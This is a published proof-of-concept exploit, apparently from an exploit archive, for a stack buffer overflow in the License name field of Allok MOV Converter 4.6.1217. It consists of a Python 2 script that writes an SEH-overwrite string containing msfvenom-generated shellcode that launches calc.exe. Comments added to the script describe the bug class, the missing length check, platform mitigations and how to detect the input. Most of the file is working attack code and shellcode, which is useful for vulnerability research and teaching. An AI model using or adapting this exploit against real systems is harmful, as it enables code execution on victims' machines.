# Exploit Title : Allok MOV Converter 4.6.1217 - Remote Buffer Overflow
# Discovery by : Shubham Singh
# Known As : Spirited Wolf [Twitter: @Pwsecspirit]
# Email : spiritedwolf@protonmail.com
# Youtube Channel : www.youtube.com/c/Pentestingwithspirit
# Discovery Date : 29/07/2018
# Software Link : http://www.alloksoft.com/allok_movconverter.exe
# Tested Version : 4.6.1217
# Tested on OS : Windows XP Service Pack 3 x86
# Steps to Reproduce: Run the python exploit script, it will create a new file with the name "exploit.txt" just copy the text inside "exploit.txt"
# Start the Allok MOV Converter 4.6.1217 program and in the License name paste the content of "exploit.txt" and click on Register.
# You will see a sweet calculator popped up.
# Greetz : @hexachordanu @FuzzySec @LiveOverflow
#
# Reviewer notes (defensive summary of what this file shows):
# - Vulnerability class: stack-based buffer overflow in the "License name" field
#   that overwrites the SEH chain. The string assembled below is laid out as
#   junk | nSEH | SEH | NOPs | payload | trailing padding.
# - Vendor-side fix: the field is evidently copied without a length check;
#   bounding the copy to the destination buffer removes the bug entirely.
# - Platform mitigations aimed at this class: SafeSEH/SEHOP, DEP and ASLR.
#   The author's test environment is XP SP3 x86 (above); whether the
#   hard-coded handler address holds on other builds is not established here.
# - Detection: a registration string of several hundred bytes dominated by
#   0x41 / 0x90 runs is a trivial input-validation anomaly to reject or alert on.
# - This is Python 2 code: string literals are byte strings, which is why they
#   can be written to a file opened in binary mode.

# Output file; the author pastes its contents into the License name field.
# NOTE: the name `file` shadows the Python 2 builtin of the same name.
file = open("exploit.txt","wb")

# Padding placed before the SEH record (780 bytes, the author's offset).
junk = "\x41" * 780
# Overwrites the next-SEH pointer; per the author this is a short jump
# forward over the handler record into the NOP sled below.
nseh = "\xeb\x10\x90\x90" #Short Jump address
# Overwrites the SEH handler pointer with a fixed address (author's value).
seh = "\x79\x25\x01\x76" #0x76012579
# NOP sled the short jump lands in before reaching the payload.
nops = "\x90" * 16
#badchar \x00\x08\x09\x0a\x0b\x0c\x0d
#msfvenom -p windows/exec CMD=calc.exe -b '\x00\x08\x09\x0a\x0b\x0c\x0d' -f python
# Encoded payload as emitted by the msfvenom command above (calc.exe launcher).
buf = ""
buf += "\xba\xbb\xf0\xaa\x11\xdd\xc3\xd9\x74\x24\xf4\x5e\x31"
buf += "\xc9\xb1\x31\x83\xee\xfc\x31\x56\x0f\x03\x56\xb4\x12"
buf += "\x5f\xed\x22\x50\xa0\x0e\xb2\x35\x28\xeb\x83\x75\x4e"
buf += "\x7f\xb3\x45\x04\x2d\x3f\x2d\x48\xc6\xb4\x43\x45\xe9"
buf += "\x7d\xe9\xb3\xc4\x7e\x42\x87\x47\xfc\x99\xd4\xa7\x3d"
buf += "\x52\x29\xa9\x7a\x8f\xc0\xfb\xd3\xdb\x77\xec\x50\x91"
buf += "\x4b\x87\x2a\x37\xcc\x74\xfa\x36\xfd\x2a\x71\x61\xdd"
buf += "\xcd\x56\x19\x54\xd6\xbb\x24\x2e\x6d\x0f\xd2\xb1\xa7"
buf += "\x5e\x1b\x1d\x86\x6f\xee\x5f\xce\x57\x11\x2a\x26\xa4"
buf += "\xac\x2d\xfd\xd7\x6a\xbb\xe6\x7f\xf8\x1b\xc3\x7e\x2d"
buf += "\xfd\x80\x8c\x9a\x89\xcf\x90\x1d\x5d\x64\xac\x96\x60"
buf += "\xab\x25\xec\x46\x6f\x6e\xb6\xe7\x36\xca\x19\x17\x28"
buf += "\xb5\xc6\xbd\x22\x5b\x12\xcc\x68\x31\xe5\x42\x17\x77"
buf += "\xe5\x5c\x18\x27\x8e\x6d\x93\xa8\xc9\x71\x76\x8d\x26"
buf += "\x38\xdb\xa7\xae\xe5\x89\xfa\xb2\x15\x64\x38\xcb\x95"
buf += "\x8d\xc0\x28\x85\xe7\xc5\x75\x01\x1b\xb7\xe6\xe4\x1b"
buf += "\x64\x06\x2d\x78\xeb\x94\xad\x51\x8e\x1c\x57\xae"
# Trailing padding after the payload.
more = "\x41" * 100
# Final string in the layout described in the header notes.
exploit = junk + nseh + seh + nops + buf + more
# Written as raw bytes; the file is closed explicitly rather than via `with`.
file.write(exploit)
file.close()